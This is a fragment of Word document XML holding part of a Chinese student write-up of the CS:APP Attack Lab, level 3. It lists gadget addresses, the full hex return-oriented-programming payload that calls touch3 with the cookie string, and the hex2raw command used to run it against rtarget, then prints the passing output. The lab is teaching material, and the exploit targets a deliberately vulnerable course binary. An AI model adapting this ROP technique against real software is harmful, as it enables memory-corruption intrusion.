          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="default"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其地址分别为 0x55 55 55 55 60 6e 、0x55 55 55 55 5f e7 、 0x55 55 55 55 5f 9e 和 0x55 55 55 55 61 42、0x55 55 55 55 60 24 、0x55 55 55 55 60 4e 、 0x55 55 55 55 5f f9 、0x55 55 55 55 5f e7</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所以输入数据为，填满 getbuf 的 56 个 00 ，加上 movq %rsp %rax  movq %rax %rdi  popq %rax 的反汇编代码，然后是偏移量 0x48 ，接着是 movl %eax,%adx  movl %edx,%ecx  movl %ecx,%esi  lea (%rdi,%rsi,1),%rax  movq %rax,%rdi 的反汇编代码,最后是 touch3 的地址和  cookie 的十六进制值的字符串。</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所以最后的输入是：</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00 00 00 00 00 00 00 00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6e 60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e7 5f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9e 5f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48 00 00 00 00 00 00 00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42 61 55 55 55 55 00 00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24 60 55 55 55 55 00 00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4e 60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f9 5f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e7 5f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e7 5e 55 55 55 55 00 00</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37 34 37 63 39 63 35 65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 xml:space="preserve">00 </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利用 cat re.txt | ./hex2raw | ./rtarget 运行一下</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Cookie: 0x747c9c5e</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Type string:Touch3!: You called touch3("747c9c5e")</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Valid solution for level 3 with target rtarget</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PASS: Sent exploit string to server to be validated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>NICE JOB!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>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Mon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A9D52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7CA9D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mNGQ4YTNiNjY2Mjc5NDJkMjU2Mjk1MTM4ZjNjMjYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="02BF3353"/>
    <w:rsid w:val="04F74F36"/>
    <w:rsid w:val="05B653C9"/>
    <w:rsid w:val="06A53F06"/>
    <w:rsid w:val="07881A89"/>
    <w:rsid w:val="10D37F0F"/>
    <w:rsid w:val="15111B03"/>
    <w:rsid w:val="15ED1921"/>
    <w:rsid w:val="19002B61"/>
    <w:rsid w:val="19DE696C"/>
    <w:rsid w:val="1BC86444"/>
    <w:rsid w:val="2C281523"/>
    <w:rsid w:val="2DA03F76"/>
    <w:rsid w:val="348224AD"/>
    <w:rsid w:val="361573A1"/>
    <w:rsid w:val="3A0E1E85"/>
    <w:rsid w:val="3BF45F75"/>
    <w:rsid w:val="451F65B8"/>
    <w:rsid w:val="47386791"/>
    <w:rsid w:val="488C519E"/>
    <w:rsid w:val="48FA10C0"/>
    <w:rsid w:val="4A446088"/>
    <w:rsid w:val="4B18719D"/>
    <w:rsid w:val="4B5919DA"/>
    <w:rsid w:val="4C8F1A70"/>
    <w:rsid w:val="4CFD182D"/>
    <w:rsid w:val="4F275616"/>
    <w:rsid w:val="504C0D6F"/>
    <w:rsid w:val="55604164"/>
    <w:rsid w:val="55D70D71"/>
    <w:rsid w:val="55FD565F"/>
    <w:rsid w:val="59E73ADE"/>
    <w:rsid w:val="5C352B73"/>
    <w:rsid w:val="5E0C7215"/>
    <w:rsid w:val="5FB50D28"/>
    <w:rsid w:val="610E19B1"/>
    <w:rsid w:val="65D820E5"/>
    <w:rsid w:val="67591D31"/>
    <w:rsid w:val="6D334216"/>
    <w:rsid w:val="729B6D42"/>
    <w:rsid w:val="75CE1F46"/>
    <w:rsid w:val="76A56115"/>
    <w:rsid w:val="76B95A95"/>
    <w:rsid w:val="785C5CFC"/>
    <w:rsid w:val="78894D2F"/>
    <w:rsid w:val="7929298D"/>
    <w:rsid w:val="7FED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4408</Words>
  <Characters>14816</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>134</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22993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2022-10-29T11:25:00Z</dcterms:created>
  <dc:creator>Mark z'j'l</dc:creator>
  <cp:lastModifiedBy>邂逅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-02T03:04:55Z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F2C60BA7BF734DE199525A43446382A8</vt:lpwstr>
  </property>
</Properties>
</file>